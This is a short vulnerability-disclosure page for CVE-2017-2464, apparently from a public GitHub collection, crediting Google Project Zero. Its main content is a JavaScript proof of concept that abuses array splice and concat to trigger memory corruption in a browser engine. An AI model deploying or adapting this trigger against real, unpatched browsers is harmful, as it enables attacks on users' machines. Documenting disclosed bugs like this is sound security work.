CVE-2017-2464

Report: Jan 2017
Fix: Mar 2017
Credit: Natalie Silvanovich, Google Project Zero

PoC

var a = [];
a.length = 0xffffff00;

var b = a.splice(0, 0x100000); // Undecided array

var args = [];
args.length = 4094;
args.fill(b);

var q = [];
q.length = 0x1000;
q.fill(7);

var c = a.splice(0, 0xfffef); //Shorter undecided array

args[4094] = c;
args[4095] = q;


b.concat.apply(b, args);

Reference

Apple
Project Zero

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2017-2464.md

CVE-2017-2464.md

CVE-2017-2464

PoC

Reference

Files

CVE-2017-2464.md

Latest commit

History

CVE-2017-2464.md

File metadata and controls

CVE-2017-2464

PoC

Reference